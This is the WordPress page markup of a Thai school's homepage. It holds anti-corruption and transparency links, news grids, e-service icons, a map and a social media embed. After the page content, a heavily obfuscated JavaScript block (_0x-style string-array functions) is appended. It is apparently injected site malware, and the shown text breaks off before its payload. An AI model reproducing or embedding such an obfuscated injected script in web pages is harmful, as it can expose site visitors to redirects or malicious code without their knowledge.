{\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"stv6u8re\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_bd7bab-81\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_a02c00-db\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_a02c00-db\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8cac31-6c\",\"tabCount\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8cac31-6c kt-tabs-has-2-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"48d9e9-20\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab48d9e9-20\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"6fe435-37\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab6fe435-37\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const 